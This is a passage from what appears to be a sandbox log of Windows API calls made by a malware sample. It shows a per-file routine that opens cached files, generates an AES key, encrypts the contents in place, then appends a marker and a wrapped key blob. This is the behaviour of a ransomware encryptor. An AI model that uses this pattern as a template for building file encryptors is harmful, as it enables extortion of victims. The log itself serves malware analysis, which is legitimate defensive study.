pdwDataLen=0x29ab118*=0x2d7, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x2e0) returned 1 [0144.424] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.424] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x2e0, lpOverlapped=0x0) returned 1 [0144.424] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.424] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.424] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.424] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.424] CloseHandle (hObject=0x198) returned 1 [0144.441] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.445] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.445] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.445] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.445] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.446] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", dwFileAttributes=0x80) returned 1 [0144.447] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.447] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=471) returned 1 [0144.447] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=471) returned 1 [0144.447] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xb5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.447] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.448] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.448] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.448] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.448] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.448] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1d7, lpOverlapped=0x0) returned 1 [0144.448] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.448] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d7, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1e0) returned 1 [0144.448] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.448] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1e0, lpOverlapped=0x0) returned 1 [0144.448] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.448] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.448] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.448] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.448] CloseHandle (hObject=0x198) returned 1 [0144.465] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.469] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.469] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.469] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.469] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.469] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD", dwFileAttributes=0x80) returned 1 [0144.470] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.470] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=813) returned 1 [0144.470] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=813) returned 1 [0144.470] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x20b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.470] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.471] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.471] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.471] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.471] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.471] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x32d, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x32d, lpOverlapped=0x0) returned 1 [0144.471] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.471] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x32d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x330) returned 1 [0144.471] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.471] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x330, lpOverlapped=0x0) returned 1 [0144.471] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.471] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.471] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.471] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.471] CloseHandle (hObject=0x198) returned 1 [0144.488] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.492] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.492] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.492] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.492] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.492] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", dwFileAttributes=0x80) returned 1 [0144.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.493] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1608) returned 1 [0144.493] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1608) returned 1 [0144.493] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x526, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.493] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.494] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.494] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.494] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.495] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.495] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x648, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x648, lpOverlapped=0x0) returned 1 [0144.495] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.495] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x648, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x650) returned 1 [0144.495] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.495] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x650, lpOverlapped=0x0) returned 1 [0144.495] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.495] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.495] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.495] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.495] CloseHandle (hObject=0x198) returned 1 [0144.522] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.526] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.526] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.526] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.526] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.526] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21", dwFileAttributes=0x80) returned 1 [0144.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.526] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=554) returned 1 [0144.526] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=554) returned 1 [0144.527] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x108, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.527] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.528] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.528] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.528] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.528] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.528] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x22a, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x22a, lpOverlapped=0x0) returned 1 [0144.528] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.528] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x22a, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x230) returned 1 [0144.528] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.528] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x230, lpOverlapped=0x0) returned 1 [0144.529] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.529] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.529] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.529] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.529] CloseHandle (hObject=0x198) returned 1 [0144.545] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.549] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.549] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.549] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.549] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.550] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", dwFileAttributes=0x80) returned 1 [0144.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.551] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=471) returned 1 [0144.551] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=471) returned 1 [0144.551] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xb5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.551] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.552] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.552] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.552] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.552] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.552] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1d7, lpOverlapped=0x0) returned 1 [0144.552] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.552] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d7, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1e0) returned 1 [0144.552] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.552] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1e0, lpOverlapped=0x0) returned 1 [0144.552] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.552] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.552] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.552] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.553] CloseHandle (hObject=0x198) returned 1 [0144.606] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.610] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.610] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.610] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.610] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.610] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9", dwFileAttributes=0x80) returned 1 [0144.612] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.612] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=506) returned 1 [0144.612] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: 